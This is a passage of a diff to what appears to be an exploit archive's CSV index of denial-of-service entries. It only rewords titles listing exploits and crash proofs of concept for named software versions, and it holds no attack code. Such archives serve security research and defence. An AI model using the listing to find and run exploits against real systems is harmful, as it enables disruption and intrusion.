Spitzner",hardware,dos,0 -19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,dos,0 +19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service",1999-07-30,"Mike Frantzen",hardware,dos,0 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 - PWS Denial of Service",1999-08-08,Narr0w,windows,dos,0 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 - Negative Content Length Denial of Service",1999-08-08,rpc,multiple,dos,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 @@ -2313,8 +2313,8 @@ id,file,description,date,author,platform,type,port 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (PoC)",1999-10-28,"Alberto Soli",windows,dos,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - RCPT TO Denial of Service",1999-10-28,"Nobuo Miwa",multiple,dos,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character Denial of Service",2012-07-04,"Soroush Dalili",windows,dos,0 -19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)",1999-10-31,nas,windows,dos,0 -19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0 +19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (1)",1999-10-31,nas,windows,dos,0 +19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0 19675,platforms/linux/dos/19675.c,"Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options",1999-12-08,"Andrea Arcangeli",linux,dos,0 19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long 'Username' Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0 19605,platforms/linux/dos/19605.c,"Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 @@ -2414,7 +2414,7 @@ id,file,description,date,author,platform,type,port 20052,platforms/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",multiple,dos,0 20054,platforms/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",windows,dos,0 20069,platforms/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 - RNTO Denial of Service",2000-07-11,"Blue Panda",windows,dos,0 -20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service Attack",2000-03-10,"Charles Chear",cgi,dos,0 +20071,platforms/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service",2000-03-10,"Charles Chear",cgi,dos,0 20072,platforms/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 - SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",novell,dos,0 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos,0 20090,platforms/hardware/dos/20090.txt,"HP JetDirect J3111A - Invalid FTP Command Denial of Service",2000-07-19,"Peter Grundl",hardware,dos,0 @@ -2472,14 +2472,14 @@ id,file,description,date,author,platform,type,port 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,linux,dos,0 -20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 +20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 - SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 20515,platforms/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption",2000-12-13,"Ilia Sprite",windows,dos,0 20518,platforms/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service",2000-12-21,"SNS Research",windows,dos,0 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos,0 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0 -20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Denial of Service (Possible Code Execution)",2001-01-09,"Marc Lehmann",linux,dos,0 +20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0 20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0 @@ -2545,7 +2545,7 @@ id,file,description,date,author,platform,type,port 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 20907,platforms/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",windows,dos,0 -20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 +20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - (SEH) Overwrite",2012-08-29,Ciph3r,windows,dos,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0 @@ -2696,7 +2696,7 @@ id,file,description,date,author,platform,type,port 21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 -21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 +21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 @@ -2950,7 +2950,7 @@ id,file,description,date,author,platform,type,port 23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 - Long HTTP Request Buffer Overflow",2003-08-21,nimber@designer.ru,multiple,dos,0 23051,platforms/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",multiple,dos,0 23053,platforms/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,windows,dos,0 -23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service Attack",2003-08-25,"Luca Ercoli",windows,dos,0 +23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service",2003-08-25,"Luca Ercoli",windows,dos,0 23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0 @@ -2973,7 +2973,7 @@ id,file,description,date,author,platform,type,port 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0 23145,platforms/windows/dos/23145.c,"Ipswitch Imail Server 5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,dos,0 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Argument Buffer Overflow",1999-03-10,Rootshell,windows,dos,0 -23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service Attack",2003-09-15,D4rkGr3y,windows,dos,0 +23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service",2003-09-15,D4rkGr3y,windows,dos,0 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0 23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0 @@ -3779,7 +3779,7 @@ id,file,description,date,author,platform,type,port 29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 -29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 +29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension - '.WBMP' File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service",2007-04-09,"Jean Delvare",linux,dos,0 @@ -3867,7 +3867,7 @@ id,file,description,date,author,platform,type,port 30672,platforms/windows/dos/30672.txt,"Live for Speed - Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos,0 30679,platforms/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 30805,platforms/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos,0 -30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - Denial of Service Reboot",2014-01-04,nicx0,hardware,dos,0 +30688,platforms/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - Reboot (Denial of Service)",2014-01-04,nicx0,hardware,dos,0 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0 @@ -4046,7 +4046,7 @@ id,file,description,date,author,platform,type,port 32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 - '.m3u' / '.pls' Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0 32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a - Psuedo Terminal Denial of Service",2008-07-23,kokanin,linux,dos,0 32125,platforms/multiple/dos/32125.txt,"Unreal Tournament 2004 - Null Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos,0 -32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Denial of Service / Memory Corruption",2008-07-30,"Luigi Auriemma",multiple,dos,0 +32127,platforms/multiple/dos/32127.txt,"Unreal Tournament 3 - Memory Corruption (Denial of Service)",2008-07-30,"Luigi Auriemma",multiple,dos,0 32136,platforms/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0 32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0 @@ -4064,7 +4064,7 @@ id,file,description,date,author,platform,type,port 32305,platforms/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",hardware,dos,0 32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 - 'APPEND' Command Remote Denial of Service",2008-09-02,Antunes,multiple,dos,0 32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 - Malformed 'title' Tag Remote Denial of Service",2008-09-02,Exodus,multiple,dos,0 -32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 +32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal Exploit (SEH) (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 32341,platforms/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos,0 @@ -4140,7 +4140,7 @@ id,file,description,date,author,platform,type,port 32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 - Malformed '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0 -32899,platforms/windows/dos/32899.py,"Jzip - SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 +32899,platforms/windows/dos/32899.py,"Jzip - Buffer Overflow (SEH Unicode) (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",windows,dos,0 32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0 32939,platforms/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",windows,dos,0 @@ -4164,7 +4164,7 @@ id,file,description,date,author,platform,type,port 33042,platforms/linux/dos/33042.txt,"Mozilla Firefox 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",linux,dos,0 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0 -33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow (PoC)",2014-04-27,st3n,windows,dos,0 +33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,windows,dos,0 33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0 @@ -4221,7 +4221,7 @@ id,file,description,date,author,platform,type,port 33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos,0 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0 -33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 +33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",hardware,dos,0 33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",windows,dos,0 @@ -4278,7 +4278,7 @@ id,file,description,date,author,platform,type,port 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 33860,platforms/windows/dos/33860.html,"Microsoft Internet Explorer 8/9/10 - 'CInput' Use-After-Free Crash (PoC) (MS14-035)",2014-06-24,"Drozdova Liudmila",windows,dos,0 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 -33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 +33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary Memory Read",2007-09-14,mu-b,multiple,dos,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP 13.0 - Remote Denial of Service",2007-10-02,mu-b,multiple,dos,0 33886,platforms/linux/dos/33886.txt,"Linux Kernel 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption",2010-04-27,"Toshiyuki Okajima",linux,dos,0 40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0 @@ -4384,7 +4384,7 @@ id,file,description,date,author,platform,type,port 35061,platforms/linux/dos/35061.c,"GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 -35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 +35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service",2010-12-27,JohnLeitch,windows,dos,0 @@ -4403,7 +4403,7 @@ id,file,description,date,author,platform,type,port 35302,platforms/linux/dos/35302.c,"Minix 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 -35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 +35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Resource Consumption (Denial of Service)",2014-11-24,CovertCodes,multiple,dos,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial of Service",2014-11-24,LiquidWorm,hardware,dos,0 35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 @@ -4432,7 +4432,7 @@ id,file,description,date,author,platform,type,port 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0 -35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - Buffer Overflow (SEH) Denial of Service (.lst)",2014-12-15,s-dz,windows,dos,0 +35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0 35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0 @@ -4531,7 +4531,7 @@ id,file,description,date,author,platform,type,port 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0 -36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0 +36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - (SEH) Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0 36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 @@ -4777,7 +4777,7 @@ id,file,description,date,author,platform,type,port 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 -38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 +38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0 38465,platforms/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,dos,0 38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 @@ -4790,9 +4790,9 @@ id,file,description,date,author,platform,type,port 38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 38558,platforms/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",android,dos,0 -38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 +38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz 